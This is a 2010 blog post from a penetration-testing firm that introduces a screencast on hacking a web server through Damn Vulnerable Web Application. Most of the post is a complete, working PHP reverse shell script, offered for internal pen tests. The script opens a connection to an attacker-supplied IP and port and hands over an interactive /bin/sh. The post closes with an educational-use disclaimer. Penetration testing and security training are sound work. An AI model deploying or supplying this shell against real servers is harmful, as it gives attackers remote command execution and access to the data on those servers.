RedTeam Labs

Information Security Vulnerablities, Exploit Code and News

CATEGORIES:      Company News General Industry News Research List View

Screencast: Hacking With Your Web Browser

Category: Research Tags: dvwa, hacking, os commanding, file upload
Posted by: labs@redteamsecure.com (Jeremiah Talamantes) on 2010-05-02 22:55:46

In this video screencast, Jeremiah Talamantes, Principal Security Consultant and Security Researcher for RedTeam Security walks us through a step by step process of how to compromise a web server using the web applications hosted on it.

One of the main points brought across in the screencast is the need for secure application development. Organizations, with some of the most hardened servers and networks, are compromised simply by the (insecure) applications they host.

The demonstrations shown in this screencast use Damn Vulnerable Web Application, netcat and other tools. The attacks shown include remote command execution, malicious file uploads, running a PHP reverse shell and dumping the remote MySQL database etc.

This video is a recommended watch for anyone serious about web application security!

Also included in this post is the PHP Reverse Shell that is used the screencast. We hope you find it useful throughout your own internal pen tests.


Web App Insecurity: Going in the Front Door from RedTeam Security on Vimeo.




PHP Reverse Shell used in this screencast:




/*

 * **************************************************************** 

 *  PHP REVERSE SHELL SCRIPT

 * ****************************************************************

 * 

 * Description:

 * Upload this PHP script to the web server in order to instantiate

 * a reverse shell on the server to the listening system.

 * 

 * Usage:

 * http://www.somedomain.com/revshell.php?ip=192.168.1.100&port=4444

 * 

 * Parameters:

 * IP - The IP of the system you would like to direct the shell to

 * PORT - The port the system is listening on

 * 

 * 

 * Jeremiah Talamantes

 * RedTeam Security

 * http://www.redteamsecure.com

 * 

 */



$ip = $_GET['ip'];

$port = $_GET['port'];



if(!filter_var($ip, FILTER_VALIDATE_IP) || !filter_var($port, FILTER_VALIDATE_INT))

{

	echo "Parameters are invalid. Exiting...

";

	echo "Usage:
";

	echo "http://www.somedomain.com/revshell.php?ip=192.168.1.100&port=4444";

	exit();  

}



/*

 * Setup

 */

set_time_limit (0);

$chunk_size = 1400;

$write_a = null;

$error_a = null;

$shell = 'uname -a; w; id; /bin/sh -i';

$daemon = 0;

$debug = 0;



chdir("/");

umask(0);



/*

 * Function used to echo output

 */

function printit ($string) {

	if (!$daemon) {

		print "$string\n";

	}

}



/*

 * Execute the reverse shell

 */



// Open reverse connection

$sock = fsockopen($ip, $port, $errno, $errstr, 30);

if (!$sock) {

	printit("$errstr ($errno)");

	exit(1);

}



/*

 * Spawn the shell

 */

$descriptorspec = array(

   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from

   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to

   2 => array("pipe", "w")   // stderr is a pipe that the child will write to

);



$process = proc_open($shell, $descriptorspec, $pipes);



if (!is_resource($process)) {

	printit("ERROR: Can't spawn shell/n/n");

	exit(1);

}



/*

 * Set to non-blocking

 */

stream_set_blocking($pipes[0], 0);

stream_set_blocking($pipes[1], 0);

stream_set_blocking($pipes[2], 0);

stream_set_blocking($sock, 0);



printit("Successfully opened reverse shell to $ip:$port");



while (1) {

	// Check for end of TCP connection

	if (feof($sock)) {

		printit("ERROR: Shell connection terminated");

		break;

	}



	// Check for end of STDOUT

	if (feof($pipes[1])) {

		printit("ERROR: Shell process terminated");

		break;

	}



	/*

	 * Wait until a command is end down $sock or

	 * some command output is available on STDOUT or STDERR

	 */

	$read_a = array($sock, $pipes[1], $pipes[2]);

	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);



	/*

	 * If we can read the TCP socket, send

	 * data to process' STDIN

	 */

	if (in_array($sock, $read_a)) {

		if ($debug) printit("SOCK READ");

		$input = fread($sock, $chunk_size);

		if ($debug) printit("SOCK: $input");

		fwrite($pipes[0], $input);

	}



	/*

	 * Send data down TCP connection if able

	 * to read from the process' STDOUT

	 */

	if (in_array($pipes[1], $read_a)) {

		if ($debug) printit("STDOUT READ");

		$input = fread($pipes[1], $chunk_size);

		if ($debug) printit("STDOUT: $input");

		fwrite($sock, $input);

	}



	/*

	 * Send data down TCP connection is able

	 * to read from STDERR

	 */

	if (in_array($pipes[2], $read_a)) {

		if ($debug) printit("STDERR READ");

		$input = fread($pipes[2], $chunk_size);

		if ($debug) printit("STDERR: $input");

		fwrite($sock, $input);

	}

}



/*

 * Clean up

 */

fclose($sock);

fclose($pipes[0]);

fclose($pipes[1]);

fclose($pipes[2]);

proc_close($process);



?>



Share |



Follow Our Twitter

Follow Our RSS

Share this: |


Categories



DISCLAIMER
    The content, tools, methodologies and proof of concept code contained in these articles are in no way intended to be used for malicious intent. This information is to be used for educational purposes only. RedTeam Security does not condone the malicious use nor does it warranty the use of any of the content contained herein.


Contact Us

Phone number:
1-612-234-7848

E-mail:

info@redteamsecure.com